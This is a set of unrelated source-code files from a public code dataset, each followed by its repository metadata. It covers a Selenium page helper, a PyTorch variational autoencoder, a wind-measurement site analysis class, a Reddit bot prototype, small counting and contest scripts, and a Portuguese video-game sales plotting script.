ele = self.get_ele(ele_loc, img_doc)
return ele.is_enabled()
# 鼠标悬浮
def mouse_on(self,ele_loc,img_doc):
mylogging.info("鼠标悬浮{}开始...".format(img_doc))
start_time = time.time()
self.wait_until_exist(ele_loc, img_doc)
ele = self.get_ele(ele_loc, img_doc)
try:
ActionChains(self.driver).move_to_element(ele).perform()
except:
# 获取失败,写日志,截图,抛出异常
mylogging.error(traceback.format_exc())
self.screenshot_save(img_doc)
raise
else:
end_time = time.time()
dur_time = end_time - start_time
mylogging.info("鼠标悬浮{}元素text,耗时{}...".format(img_doc,dur_time))
# 鼠标悬浮
def switch_to_iframe(self,ele_loc,img_doc):
mylogging.info("切换iframe{}开始...".format(img_doc))
start_time = time.time()
self.wait_until_exist(ele_loc, img_doc)
ele = self.get_ele(ele_loc, img_doc)
try:
self.driver.switch_to.frame(ele)
except:
# 获取失败,写日志,截图,抛出异常
mylogging.error(traceback.format_exc())
self.screenshot_save(img_doc)
raise
else:
end_time = time.time()
dur_time = end_time - start_time
mylogging.info("切换iframe{}结束,耗时{}...".format(img_doc,dur_time))
# 鼠标悬浮
def set_attr(self,ele_loc,attr,value,img_doc,):
mylogging.info("修改{}属性{}值为{}开始...".format(img_doc,attr,value))
start_time = time.time()
self.wait_until_exist(ele_loc, img_doc)
ele = self.get_ele(ele_loc, img_doc)
try:
self.driver.execute_script('arguments[0].{}={}'.format(attr,value))
except:
# 获取失败,写日志,截图,抛出异常
mylogging.error(traceback.format_exc())
self.screenshot_save(img_doc)
raise
else:
end_time = time.time()
dur_time = end_time - start_time
mylogging.info("修改{}属性{}值为{}结束,耗时{}...".format(img_doc,attr,value,dur_time))
def screenshot_save(self,img_doc):
# 保存截图传入名称拼接当前时间命名
nowtime = time.strftime('%Y-%m-%d_%HH-%MM-%SS', time.localtime())
img_name = img_doc + nowtime + ".png"
# 拼接截图名称与截图保存路径
img_file_path = os.path.join(screenshot_path,img_name)
try:
mylogging.info("保存截图{}...".format(img_name))
self.driver.save_screenshot(img_file_path)
except:
# 保存截图报错则写日志
mylogging.exception("保存截图{}报错...".format(img_name))
| 531612146/web_auto | common/basepage.py | basepage.py | py | 8,784 | python | en | code | 0 | github-code | 90 |
43344620656 | import torch
import torch.nn as nn
from torch.autograd import Variable
class Encoder(nn.Module):
def __init__(self, nc, nef, nz, isize, device):
super(Encoder, self).__init__()
# Device
self.device = device
# Encoder: (nc, isize, isize) -> (nef*8, isize//16, isize//16)
self.encoder = nn.Sequential(
nn.Conv2d(nc, nef, 4, 2, padding=1),
nn.LeakyReLU(0.2, True),
nn.BatchNorm2d(nef),
nn.Conv2d(nef, nef*2, 4, 2, padding=1),
nn.LeakyReLU(0.2, True),
nn.BatchNorm2d(nef*2),
nn.Conv2d(nef*2, nef*4, 4, 2, padding=1),
nn.LeakyReLU(0.2, True),
nn.BatchNorm2d(nef*4),
nn.Conv2d(nef*4, nef*8, 4, 2, padding=1),
nn.LeakyReLU(0.2, True),
nn.BatchNorm2d(nef*8)
)
# Map the encoded feature map to the latent vector of mean, (log)variance
out_size = isize // 16
self.mean = nn.Linear(nef*8*out_size*out_size, nz)
self.logvar = nn.Linear(nef*8*out_size*out_size, nz)
def reparametrize(self, mu, logvar):
### return sample from normal distribution using reparametrization trick given MU and LOGVARiance
std = logvar.mul(0.5).exp_()
multi_norm = torch.FloatTensor(std.size()).normal_().to(self.device)
multi_norm = Variable(multi_norm)
return multi_norm.mul(std).add_(mu)
def forward(self, inputs):
# Batch size
batch_size = inputs.size(0)
# Calculate mean and (log)variance
hidden = self.encoder(inputs).view(batch_size, -1)
mean, logvar = self.mean(hidden), self.logvar(hidden)
# Sample
latent_z = self.reparametrize(mean, logvar)
return latent_z, mean, logvar
class Decoder(nn.Module):
def __init__(self, nc, ndf, nz, isize):
super(Decoder, self).__init__()
# Map the latent vector to the feature map space
self.ndf = ndf
self.out_size = isize // 16
self.decoder_dense = nn.Sequential(
nn.Linear(nz, ndf*8*self.out_size*self.out_size),
nn.ReLU(True)
)
# Decoder: (ndf*8, isize//16, isize//16) -> (nc, isize, isize)
self.decoder_conv = nn.Sequential(
nn.UpsamplingNearest2d(scale_factor=2),
nn.Conv2d(ndf*8, ndf*4, 3, padding=1),
nn.LeakyReLU(0.2, True),
nn.BatchNorm2d(ndf*4, 1.e-3),
nn.UpsamplingNearest2d(scale_factor=2),
nn.Conv2d(ndf*4, ndf*2, 3, padding=1),
nn.LeakyReLU(0.2, True),
nn.BatchNorm2d(ndf*2, 1.e-3),
nn.UpsamplingNearest2d(scale_factor=2),
nn.Conv2d(ndf*2, ndf, 3, padding=1),
nn.LeakyReLU(0.2, True),
nn.BatchNorm2d(ndf, 1.e-3),
nn.UpsamplingNearest2d(scale_factor=2),
nn.Conv2d(ndf, nc, 3, padding=1)
)
def forward(self, input):
batch_size = input.size()[0]
hidden = self.decoder_dense(input).view(
batch_size, self.ndf*8, self.out_size, self.out_size)
output = self.decoder_conv(hidden) # reconstructed image
return output
class VAE(nn.Module):
def __init__(self, nc=3, ndf=32, nef=32, nz=100, isize=64, device=torch.device("cuda:0"), is_train=True):
super(VAE, self).__init__()
self.nz = nz
self.isize=isize
# Encoder
self.encoder = Encoder(nc=nc, nef=nef, nz=nz, isize=isize, device=device)
# Decoder
self.decoder = Decoder(nc=nc, ndf=ndf, nz=nz, isize=isize)
if is_train == False:
for param in self.encoder.parameters():
param.requires_grad = False
for param in self.decoder.parameters():
param.requires_grad = False
def forward(self, x):
latent_z, mean, logvar = self.encoder(x)
rec_x = self.decoder(latent_z)
return rec_x, mean, logvar
def encode(self, x):
latent_z, _, _ = self.encoder(x)
return latent_z
def decode(self, z):
return self.decoder(z)
def reparametrize(self, mu, logvar):
### return sample from normal distribution using reparametrization trick given MU and LOGVARiance
std = logvar.mul(0.5).exp_()
multi_norm = torch.FloatTensor(std.size()).normal_().to(self.device)
multi_norm = Variable(multi_norm)
return multi_norm.mul(std).add_(mu)
def sample(self, size):
# generate random sample z from prior p(z) and pass through the decoder. It will be your new generated sample
mu, sigma = torch.zeros((size, self.nz)).to(self.device), torch.ones((size, self.nz)).to(self.device)
z = self.reparametrize(mu, sigma)
dec_output = self.decode(z)
return dec_output
@property
def device(self): return next(self.parameters()).device
| szadedyurina/vae_serve | server/model.py | model.py | py | 4,930 | python | en | code | 0 | github-code | 90 |
8571526036 | # -*- coding: utf-8 -*-
'''
Site
A site import and analysis class built
with the pandas library
'''
import anemoi as an
import pandas as pd
import numpy as np
import itertools
class Site(object):
'''Subclass of the pandas dataframe built to import and quickly analyze
met mast data.'''
def __init__(self, masts=None, meta_data=None, primary_mast=None):
'''Data structure with an array of anemoi.MetMasts and a DataFrame of
results:
Parameters
----------
masts: array of anemoi.MetMasts
meta_data: DataFrame of analysis results
primary_mast: string or int, default None
Longest-term mast installed on site
'''
if masts is not None:
mast_names = []
mast_lats = []
mast_lons = []
mast_heights = []
mast_primary_anos = []
mast_primary_vanes = []
for mast in masts:
if isinstance(mast, an.MetMast):
mast_names.append(mast.name)
mast_lats.append(mast.lat)
mast_lons.append(mast.lon)
mast_heights.append(mast.height)
mast_primary_anos.append(mast.primary_ano)
mast_primary_vanes.append(mast.primary_vane)
if meta_data is None:
meta_data = pd.DataFrame(columns=mast_names,
index=['Lat', 'Lon', 'Height', 'PrimaryAno', 'PrimaryVane'])
meta_data.loc['Lat', :] = mast_lats
meta_data.loc['Lon', :] = mast_lons
meta_data.loc['Height', :] = mast_heights
meta_data.loc['PrimaryAno', :] = mast_primary_anos
meta_data.loc['PrimaryVane', :] = mast_primary_vanes
meta_data.columns.name = 'Masts'
self.masts = masts
self.meta_data = meta_data
def __repr__(self):
mast_names = 'Site masts: '
for mast in self.masts:
if mast_names == 'Site masts: ':
mast_names = mast_names + ' ' + str(mast.name)
else:
mast_names = mast_names + ', ' + str(mast.name)
return mast_names
def check_has_masts(self):
if len(self.masts) < 1:
raise ValueError("This site doesn't seem to have any masts associated...")
return True
def get_mast_names(self):
if not self.masts:
raise ValueError("This site doesn't seem to have any masts associated...")
else:
return self.meta_data.columns
def return_ws_corr_results_binned_by_direction(self):
if self.check_has_masts():
site_correlation_results = []
for mast_pair in itertools.permutations(self.masts, 2):
ref_mast = mast_pair[0]
site_mast = mast_pair[1]
results = an.correlate.correlate_masts_10_minute_by_direction(ref_mast=ref_mast, site_mast=site_mast)
site_correlation_results.append(results)
site_correlation_results = pd.concat(site_correlation_results, axis=0)
return site_correlation_results
def return_cross_corr_results_dataframe(self):
if self.check_has_masts():
cross_corr_results_index = pd.MultiIndex.from_product([self.meta_data.columns.tolist()]*2, names=['Ref', 'Site'])
results_cols = ['Slope', 'Offset', 'DirOffset', 'R2', 'Uncert']
cross_corr_results_dataframe = pd.DataFrame(index=cross_corr_results_index, columns=results_cols)
refs = cross_corr_results_dataframe.index.get_level_values(level='Ref')
sites = cross_corr_results_dataframe.index.get_level_values(level='Site')
cross_corr_results_dataframe = cross_corr_results_dataframe.loc[refs != sites, :]
return cross_corr_results_dataframe
def calculate_measured_momm(self):
'''Calculates measured mean of monthly mean wind speed for each mast in anemoi.Site'''
if self.check_has_masts():
for mast in self.masts.Masts:
self.meta_data.loc['Meas MoMM', mast.name] = mast.return_momm(sensors=mast.primary_ano).iloc[0,0]
def calculate_self_corr_results(self):
if self.check_has_masts():
cross_corr_results = self.return_cross_corr_results_dataframe()
for mast_pair in cross_corr_results.index:
ref = mast_pair[0]
site = mast_pair[1]
ref_mast = self.masts.loc[ref,'Masts']
site_mast = self.masts.loc[site,'Masts']
slope, offset, uncert, R2 = site_mast.correlate_to_reference(reference_mast=ref_mast, method='ODR')
results_cols = ['Slope', 'Offset', 'R2', 'Uncert']
cross_corr_results.loc[pd.IndexSlice[ref, site], results_cols] = [slope, offset, R2, uncert]
return cross_corr_results
def calculate_annual_shear_results(self):
if self.check_has_masts():
shear_results = an.shear.shear_analysis_site(self.masts)
return shear_results
def calculate_long_term_alpha(self):
'''Calculates measured annual alpha for each mast in anemoi.Site'''
if self.check_has_masts():
for mast in self.masts:
self.meta_data.loc['Alpha', mast.name] = mast.calculate_long_term_alpha()
def plot_monthly_valid_recovery(self):
'''Plots monthly valid recovery for each mast in anemoi.Site'''
if self.check_has_masts():
for mast in self.masts:
mast.plot_monthly_valid_recovery()
def plot_freq_dists(self):
'''Plots wind speed frequency distributions for each mast in anemoi.Site'''
if self.check_has_masts():
for mast in self.masts:
mast.plot_freq_dist()
def plot_wind_roses(self):
'''Plots wind speed frequency distributions for each mast in anemoi.Site'''
if self.check_has_masts():
for mast in self.masts:
mast.plot_wind_rose()
def plot_site_masts_summary(self):
for mast in self.masts:
print(mast.mast_data_summary(), mast, '\n')
mast.plot_monthly_valid_recovery();
mast.plot_wind_energy_roses(dir_sectors=12);
mast.plot_freq_dist();
# plt.show()
def plot_ws_corr_results_binned_by_direction(self):
site_correlation_results = self.return_ws_corr_results_binned_by_direction()
dir_bins = site_correlation_results.index.get_level_values('DirBin').unique()
for mast_pair in itertools.permutations(self.masts, 2):
ref_mast = mast_pair[0]
ref_mast_name = ref_mast.name
site_mast = mast_pair[1]
site_mast_name = site_mast.name
ref_data = ref_mast.return_sensor_data([ref_mast.primary_ano, ref_mast.primary_vane])
site_data = site_mast.return_sensor_data(site_mast.primary_ano)
df = pd.concat([ref_data, site_data], axis=1, join='inner', keys=['Ref', 'Site']).dropna()
df.columns = ['RefWS', 'RefDir', 'SiteWS']
df = an.correlate.append_dir_bin(df, dir_column='RefDir')
an.plotting.plot_ws_correlation_by_direction(df=df,
site_corr_results=site_correlation_results,
site_mast_name=site_mast_name,
ref_mast_name=ref_mast_name)
| coryjog/anemoi | anemoi/site.py | site.py | py | 7,687 | python | en | code | 19 | github-code | 90 |
13328083563 | '''
app.py
The script that runs this bot
'''
import praw
from reddit.config import REDDIT
from reddit import wikipedia
def wiki_testing():
'''Practicing finding wikipedia links
in a string'''
comment = 'steins gate is pretty cool https://en.wikipedia.org/wiki/Steins;Gate_(TV_series)'
# prints a list containing any wikipedia links
print(wikipedia.get_urls(comment))
def comment_testing():
''' Practicing looking through reddit
comments. Currently need to be able to look through
replies recursively. Look in agenda.txt for more details
'''
submissions = REDDIT.subreddit('all').hot(limit=1) # first 100 submissions in r/all
comment_count = 0
for submission in submissions:
print('\n' + submission.title + '\n')
for comment in submission.comments:
print()
if comment_count < 15:
print(comment.body)
comment_count += 1
else:
break
def main():
comment_testing()
print()
wiki_testing()
if __name__ == '__main__':
main()
| JJDProjects/wiki_search_bot | app.py | app.py | py | 968 | python | en | code | 1 | github-code | 90 |
35402739976 | # coding: utf-8
#単語をの数をカウントする
#入力された文字列をスペースで分割する
strlist = input().split(" ")
# 重複する文字列を除外する
N = []
for x in strlist:
if x not in N:
N.append(x)
# 単語の数をカウントして出力
for i in range(len(N)):
print(N[i],strlist.count(N[i]))
| Automa237/Python_training | str_counter.py | str_counter.py | py | 345 | python | ja | code | 1 | github-code | 90 |
18546707859 | n = int(input())
x = list(map(int,input().split()))
y = sorted(x)
for i in x:
if y[(n+1)//2-1] >= i:
print(y[(n+1)//2])
else:
print(y[(n+1)//2-1]) | Aasthaengg/IBMdataset | Python_codes/p03379/s884976672.py | s884976672.py | py | 173 | python | en | code | 0 | github-code | 90 |
17984153539 | n,m = map(int,input().split())
mod = 10**9+7
def mod_f(i):
ans = 1
for i in range(1,i+1):
ans *= i
ans %= mod
return ans
if abs(n-m) > 1:
print(0)
elif n == m:
print((mod_f(n)*mod_f(m)*2)%mod)
else:
print((mod_f(n)*mod_f(m))%mod) | Aasthaengg/IBMdataset | Python_codes/p03681/s907212145.py | s907212145.py | py | 270 | python | en | code | 0 | github-code | 90 |
10735515445 | import matplotlib.pyplot as plt
import os.path
import csv
from matplotlib import style
style.use('bmh')
def busca_1(ano,mod,gen):#--------------------------BUSCA 1 ------------------------------------------------------
arq = open('vgsales.csv', 'r')
lista=[]
L=[]
media=[0,0,0,0,0,0,0,0,0,0,0,0]
genero = [0,0,0,0,0,0,0,0,0,0,0,0]
nomes=['Action','Role-Playing', 'Shooter', 'Platform', 'Sports','Simulation',
'Fighting','Misc', 'Adventure','Racing', 'Puzzle','Strategy']
for linha in arq:
linha=linha.replace('\n', '')
lista.append(linha.split(','))
arq.close()
from decimal import Decimal as d
for i in range (1,len(lista)):
L=lista[i]
d(L[10])
L[10]==float(L[10])
if L[4]=='Action'and L[3]== ano:
genero[0] +=d(L[10])
media[0] += 1
if L[4]=='Role-Playing'and L[3]== ano:
genero[1] +=d(L[10])
media[1] += 1
if L[4]=='Shooter'and L[3]== ano:
genero[2] +=d(L[10])
media[2] += 1
if L[4]=='Platform'and L[3]== ano:
genero[3] +=d(L[10])
media[3] += 1
if L[4]=='Sports'and L[3]== ano:
genero[4] +=d(L[10])
media[4] += 1
if L[4]=='Simulation'and L[3]== ano:
genero[5] +=d(L[10])
media[5] += 1
if L[4]=='Fighting'and L[3]== ano:
genero[6] +=d(L[10])
media[6] += 1
if L[4]=='Misc'and L[3]== ano:
genero[7] +=d(L[10])
media[7] += 1
if L[4]=='Adventure'and L[3]== ano:
genero[8] +=d(L[10])
media[8] += 1
if L[4]=='Racing'and L[3]== ano:
genero[9] +=d(L[10])
media[9] += 1
if L[4]=='Puzzle'and L[3]== ano:
genero[10] +=d(L[10])
media[10] += 1
if L[4]=='Strategy'and L[3]== ano:
genero[11] +=d(L[10])
media[11] += 1
for i in range(12):
if genero[i]!=0:
genero[i]= genero[i]/media[i]
if mod == "1":
for i in range(12):
if nomes[i]==gen:
return(genero[i])
#-------gera hitorico----
x=''
y=''
for i in range(len(nomes)):
if i != 0:
x +=','
y +=','
x += str(nomes[i])
y += str(genero[i])
h='busca_1,'+'Ano:'+ano+'|'+x+'|'+y+'|'+'\n'
escrever(h)
#-------------------
return(graphics(nomes,genero,ano))
def graphics(nomes,lista,ano):
fig = plt.figure()
ax1 = plt.subplot2grid((1,1), (0,0))
x = nomes
y = lista
for label in ax1.xaxis.get_ticklabels():
label.set_rotation (45)
plt.bar(x,y)
plt.xlabel('Genero')
plt.ylabel('Média Global')
plt.title('Média X Gênero ano: {0}'.format(ano))
plt.show()
#----------------------------------------BUSCA 2 ---------------------------------------------------------
def busca_2(ano,gen):
arq = open('vgsales.csv', 'r')
dic={'':0,' ':0,' ':0,' ':0,' ':0,' ':0,
' ':0,' ':0,' ':0,' ':0,}#nomes e numeros
dic1=[]#numeros
dic2=[]#nomes
lista=[]
for linha in arq:
linha=linha.replace('\n', '')
lista.append(linha.split(','))
arq.close()
for i in range (1,len(lista)):
L=lista[i]
if L[4]==gen and L[3]== ano:
if L[5] in dic: #verifica se ja tem uma chave no dicionário
dic[L[5]]+= 1
else: #escreve uma nova chave no dicionário
dic.update({L[5]:1})
dic1= sorted(dic.values())
dic1.reverse()
for i in dic1:#numeros
for j in dic:#nomes
if dic[j] == i:
dic2.append(j)
dic[j]=-1
nome=[]
publicacoes=[]
for i in range(10):
nome.append(dic2[i])
publicacoes.append(dic1[i])
#---gera hitorico-----
x=''
y=''
for i in range(len(nome)):
if i != 0:
x +=','
y +=','
x += str(nome[i])
y += str(publicacoes[i])
h='busca_2,'+'Ano:'+ano+',Gênero:'+gen+'|'+x+'|'+y+'|'+'\n'
escrever(h)
#-----------------
return(graphics2(nome,publicacoes,ano,gen))
def graphics2(dic2,dic1,ano,gen):
x = dic2
y = dic1
plt.barh(x,y)
plt.xlabel('Genero')
plt.ylabel('Empresas')
plt.title('Empresas X Publicações ano {0} Genero {1}'.format(ano,gen))
plt.subplots_adjust(left = 0.22, bottom = 0.09)
plt.show()
#-------------------------------------BUSCA 3----------------------------------
def busca_3 (regiao):
def pegarConsoles():
console = []
with open ('vgsales.csv', 'r') as vendasArquivo:
leitor_csv = csv.reader(vendasArquivo)
for line in leitor_csv:
if(line[2]) not in console:
console.append(line[2]) #add a plataforma
del(console[0]) #deleta a palavra plataform
vendasArquivo.close()
return console #lista de todos os platadormas existentes no banco de dado
with open ('vgsales.csv', 'r') as vendasArquivo:
leitor_csv = csv.reader(vendasArquivo)
console = pegarConsoles()
#Constroi os listas com 'n' zeros, sendo 'n' a quantidade de consoles
somatorioValorVendasConsole = [0 for k in range(len(console))]
quantidadeDeVendasConsole = [0 for k in range(len(console))]
mediaDeCadaConsole = [0 for k in range(len(console))]
for line in leitor_csv: #Percorre todas as linhas do arquivo
meuContador = 0 #Mesma coisa que id ou indice
for k in console: #k serA cada um dos consoles
if(line[2] == k):
somatorioValorVendasConsole[meuContador] += float(line[regiao])
quantidadeDeVendasConsole[meuContador] += 1
break # So precisa percorrer ate que o primeiro console apareca
meuContador += 1 #contador utilizado para resgate por indice
meuContador = 0
for k in console: #calcula as mEdias de cada um dos consoles de acordo com a regiao
if(float(somatorioValorVendasConsole[meuContador]) != 0 or float(quantidadeDeVendasConsole[meuContador]) != 0):
mediaDeCadaConsole[meuContador] = float(somatorioValorVendasConsole[meuContador]) / float(quantidadeDeVendasConsole[meuContador])
else: #para nao dividir por zero
mediaDeCadaConsole[meuContador] = 0
meuContador += 1
top10medias = []
top10console = []
top10med=[]
top10con=[]
contador = 0
top10={}
if regiao == 6:
regiao='NA'
if regiao == 7:
regiao='EU'
if regiao == 8:
regiao='JP'
if regiao == 9:
regiao='Other'
for k in range(32):
top10medias.append(mediaDeCadaConsole[contador])
top10con.append(console[contador])
contador += 1
for i in range(32):
top10.update({top10con[i]:top10medias[i]})
top10medias = sorted(top10.values())
top10medias.reverse()
for i in top10medias:#numeros
for j in top10:#nomes
if top10[j] == i:
top10console.append(j)
top10[j]=-1
c = 0
top10mediasPlot = []
top10consolePlot = []
for k in range(10):
top10mediasPlot.append(top10medias[c])
top10consolePlot.append(top10console[c])
c += 1
vendasArquivo.close()
#------Gera historico--
x=''
y=''
for i in range(len(top10consolePlot)):
if i != 0:
x +=','
y +=','
x += str(top10consolePlot[i])
y += str(top10mediasPlot[i])
h='busca_3,'+'Região:'+regiao+'|'+x+'|'+y+'|'+'\n'
escrever(h)
#----------------------
return graphics3(top10consolePlot, top10mediasPlot,regiao)
def graphics3(top10consolePlot, top10mediasPlot,regiao):
x = ()
y = ()
x = top10consolePlot
y = top10mediasPlot
plt.scatter(x, y, s = 30)
plt.grid(True)
plt.xlabel('Plataforma:')
plt.ylabel('Médias:')
plt.title('Média X Plataforma,Região {0}'.format(regiao))
plt.show()
#-------------------------------------BUSCA 4 -----------------------------------------------------------
def busca_4(gen):
arq = open('vgsales.csv', 'r')
lista = []
L = []
med = [0,0,0,0,0]
regiao = ['NA', 'EU', 'JP', 'Other', 'Global']
for linha in arq:
linha=linha.replace('\n', '')
lista.append(linha.split(','))
arq.close()
for i in range (1,len(lista)):
L = lista[i]
if L[4] == gen :
med[0] += float(L[6])
med[1] += float(L[7])
med[2] += float(L[8])
med[3] += float(L[9])
med[4] += float(L[10])
loop0(0,med,regiao,gen)
#-------Recursiva--------
def loop0(i,med,regiao,gen):
med[i] *= 100.00 / (2*med[4])
i += 1
if i != 5:
return loop0(i,med,regiao,gen)
x=''
y=''
return loop1(0,med,gen,regiao,x,y)
graphics4(med,regiao,gen)
def loop1(i,med,gen,regiao,x,y):
if i != 0:
x +=','
y +=','
x += str(regiao[i])
y += str(med[i])
i += 1
if i != 5:
return loop1(i,med,gen,regiao,x,y)
h='busca_4,'+'Gênero:'+gen+'|'+x+'|'+y+'|'+'\n'
escrever(h)
graphics4(med,regiao,gen)
#-----------Tela
def graphics4(med,regiao,gen):
cor = ['#4682B4', '#708090', '#6A5ACD', '#191970', '#ADD8E6']
plt.pie(med, labels = regiao,
startangle = 90,
colors = cor,
shadow = True,
explode = (0, 0, 0, 0, 0),
autopct = '%1.1f%%')
plt.title('Região X Média,Gênero:{0}'.format(gen))
plt.show()
#-------------------------------------BUSCA 5 ---------------------------------
def busca_5(anoA,anoB,gen,intervalo):
lista=[]
anos=[]
while anoA != anoB+1:
x=busca_1(str(anoA),'1',gen)
lista.append(x)
anos.append(str(anoA))
anoA+= 1
#--- Gera historico--
x=''
y=''
for i in range(len(lista)):
if i != 0:
x +=','
y +=','
x += str(anos[i])
y += str(lista[i])
h='busca_5,'+'Gênero:'+gen+',Intervalo:'+intervalo+'|'+x+'|'+y+'|'+'\n'
escrever(h)
#------------------
graphics5(lista,anos,gen,intervalo)
#return busca_5() ################
def graphics5(lista,anos,gen,intervalo):
fig = plt.figure()
ax1 = plt.subplot2grid((1,1), (0,0))
x = anos
y = lista
for label in ax1.xaxis.get_ticklabels():
label.set_rotation (45)
plt.bar(x,y)
plt.ylabel('Média Global')
plt.title('Médias globais entre {0}, Gênero: {1}'.format(intervalo,gen))
plt.show()
#-----------------------------BUSCA 6 -----------------------------------------
def busca_6(ano, ano2,qgen):
arq = open('vgsales.csv', 'r')
lista=[]
L=[]
xano =[]
cont=-1
game=''
gnome=''
n=['Action','Role-Playing', 'Shooter', 'Platform', 'Sports','Simulation',
'Fighting','Misc', 'Adventure','Racing', 'Puzzle','Strategy']
dic={'Action':0,'Role-Playing':0, 'Shooter':0, 'Platform':0, 'Sports':0,'Simulation':0,
'Fighting':0,'Misc':0, 'Adventure':0,'Racing':0, 'Puzzle':0,'Strategy':0}
ano1 = 0
an1 = 0
an2 = 0
ano22 = 0
ano1 = ano
ano22 = ano2
an1 = ano1
an2 = ano22
intervalo = str(an1)+'-'+str(an2)
while ano1 <= ano22:
xano.append(ano1)
ano1 += 1
nomes=[]
valor=[0,0,0,0,0,0,0,0,0,0,0,0]
valorgame=[0,0,0,0,0,0,0,0,0,0,0,0]
g1=[]
g2=[]
g3=[]
g4=[]
g5=[]
g6=[]
g7=[]
g8=[]
g9=[]
g10=[]
g11=[]
g12=[]
for linha in arq:
linha=linha.replace('\n', '')
lista.append(linha.split(','))
arq.close()
a=ano
b=ano2
while a != b+1:
for i in range (1,len(lista)):
L=lista[i]
for j in range (12):
if L[4]== n[j] and L[3]== str(a):
valor[j] += 1
dic[n[j]] += 1
a += 1
valor.sort(reverse=True)
for i in range(12):
for i in valor:#numeros
for j in dic:#nomes
if dic[j] == i:
nomes.append(j)
dic[j]=-1
while ano != ano2 +1:
cont +=1
for i in range (1,len(lista)):
L=lista[i]
for j in range (12):
if L[4]== nomes[j] and L[3]== str(ano):
valorgame[j] += 1
ano += 1
g1.append(valorgame[0])
g2.append(valorgame[1])
g3.append(valorgame[2])
g4.append(valorgame[3])
g5.append(valorgame[4])
g6.append(valorgame[5])
g7.append(valorgame[6])
g8.append(valorgame[7])
g9.append(valorgame[8])
g10.append(valorgame[9])
g11.append(valorgame[10])
g12.append(valorgame[11])
valorgame=[0,0,0,0,0,0,0,0,0,0,0,0]
for i in range(len(nomes)):
if i != 0:
gnome +=','
gnome += str(nomes[i])
m =''
n =''
o =''
p =''
q =''
r =''
s =''
t =''
u =''
v =''
w =''
x =''
for i in range(len(g1)):
if i != 0:
m += ','
n += ','
o += ','
p += ','
q += ','
r += ','
s += ','
t += ','
u += ','
v += ','
w += ','
x += ','
m += str(g1[i])
n += str(g2[i])
o += str(g3[i])
p += str(g4[i])
q += str(g5[i])
r += str(g6[i])
s += str(g7[i])
t += str(g8[i])
u += str(g9[i])
v += str(g10[i])
w += str(g11[i])
x += str(g11[i])
game = m+'*'+n+'*'+o+'*'+p+'*'+q+'*'+r+'*'+s+'*'+t+'*'+u+'*'+v+'*'+w+'*'+x
#--- Gera historico---
xxx=''
for i in range(len(xano)):
if i != 0:
xxx +=','
xxx += str(xano[i])
h='busca_6,Gêneros:'+str(qgen)+',Intervalo:'+intervalo+'|'+str(gnome)+'|'+game+'|'+str(qgen)+'|'+xxx+'|'+str(an1)+'|'+str(an2)+'\n'
escrever(h)
graphics6(game,gnome, xano, qgen, an1, an2)
def graphics6(game,gnome, xano, qgen, an1, an2):
A=[]
g0=[]
g1=[]
g2=[]
g3=[]
g4=[]
g5=[]
g6=[]
g7=[]
g8=[]
g9=[]
g10=[]
g11=[]
game=game.split('*')
gnome=gnome.split(',')
g0=game[0].split(',')
g1=game[1].split(',')
g2=game[2].split(',')
g3=game[3].split(',')
g4=game[4].split(',')
g5=game[5].split(',')
g6=game[6].split(',')
g7=game[7].split(',')
g8=game[8].split(',')
g9=game[9].split(',')
g10=game[10].split(',')
g11=game[11].split(',')
for i in range(len(g0)):
g0[i]=int(g0[i])
g1[i]=int(g1[i])
g2[i]=int(g2[i])
g3[i]=int(g3[i])
g4[i]=int(g4[i])
g5[i]=int(g5[i])
g6[i]=int(g6[i])
g7[i]=int(g7[i])
g8[i]=int(g8[i])
g9[i]=int(g9[i])
g10[i]=int(g10[i])
g11[i]=int(g11[i])
i = qgen
if i >= 1:
plt.plot(xano, g0, label = gnome[0])
if i >= 2:
plt.plot(xano, g1, label = gnome[1])
if i >= 3:
plt.plot(xano, g2, label = gnome[2])
if i >= 4:
plt.plot(xano, g3, label = gnome[3])
if i >= 5:
plt.plot(xano, g4, label = gnome[4])
if i >= 6:
plt.plot(xano, g5, label = gnome[5])
if i >= 7:
plt.plot(xano, g6, label = gnome[6])
if i >= 8:
plt.plot(xano, g7, label = gnome[7])
if i >= 9:
plt.plot(xano, g8, label = gnome[8])
if i >= 10:
plt.plot(xano, g7, label = gnome[9])
if i >= 11:
plt.plot(xano, g10, label = gnome[10])
if i >= 12:
plt.plot(xano, g11, label = gnome[11])
plt.ylabel('Número de jogos')
plt.xlabel('Intervalo de anos')
plt.title('Número de jogos por gênero no ano de {0} - {1}'.format(an1, an2))
plt.legend()
plt.show()
#-----------------------------BUSCA 13-----------------------------------------
def busca_13(ano1, ano2, gen):
intervaloAnos = []
intervalo=str(ano1)+'-'+str(ano2)
lista = []
anos_str = []
top20_mundial = []
c = 0
ano = ano1
while ano1 <= ano2:#gera uma lista com todos os anos
intervaloAnos.append(ano1)
ano1 += 1
anos_str = str(intervaloAnos)#anos em str
with open ('vgsales.csv', 'r') as vendasArquivo:
leitor_csv = csv.reader(vendasArquivo)
for line in leitor_csv:
if (line[3] in anos_str) and (line[4] == gen):
lista.append(line)#cria uma lista com as linhas que correspondam ao genero e ao intervalo de anos
for i in range(20):
top20_mundial.append(lista[i])#da lista gerada, separa os 20 primeiros lugares
jogosTop20 = []
vendasTop20_jpsales = []
vendasTop20_eusales = []
for line in top20_mundial:
if (line[1]) in jogosTop20:
jogosTop20.append(line[1]+'..R')#append os jogos
else:
jogosTop20.append(line[1])
if (line[7]) != ' ' or 0 or '0':
vendasTop20_eusales.append(float(line[7]))#append nas vendas de eu sales
else:
vendasTop20_eusales.append(0)#append 0 se nao tiver valor algum
if (line[8]) != ' ' or 0 or '0':
vendasTop20_jpsales.append(float(line[8]))#append nas vendas jp sales
else:
vendasTop20_jpsales.append(0)
vendasArquivo.close()
#--- Gera historico--
x=''
y=''
z=''
for i in range(len(jogosTop20)):
if i != 0:
x +=','
y +=','
z +=','
x += str(jogosTop20[i])
y += str(vendasTop20_jpsales[i])
z += str(vendasTop20_eusales[i])
h='busca_13,'+'Gênero:'+gen+',Intervalo:'+intervalo+'|'+x+'|'+y+'|'+z+'|'+'\n'
escrever(h)
#------------------
return (graphics13(jogosTop20, vendasTop20_jpsales, vendasTop20_eusales,intervalo, gen))
def graphics13(jogosTop20, vendasTop20_jpsales, vendasTop20_eusales,intervalo, gen):
plt.scatter(vendasTop20_jpsales, jogosTop20, color = 'b', label = 'Vendas no Japão')
plt.scatter(vendasTop20_eusales, jogosTop20, color = 'r', label = 'Vendas na Europa')
plt.xlabel('Vendas nas regiões EU e JP')
plt.ylabel('Top 20 jogos ')
plt.title('Top 20 jogos entre {0},Gênero: {1}'.format(intervalo, gen))
plt.grid(True)
plt.subplots_adjust(left = 0.39, right = 0.97)
plt.legend()
plt.show()
#------------------------------------------------------------------------------------------------------------
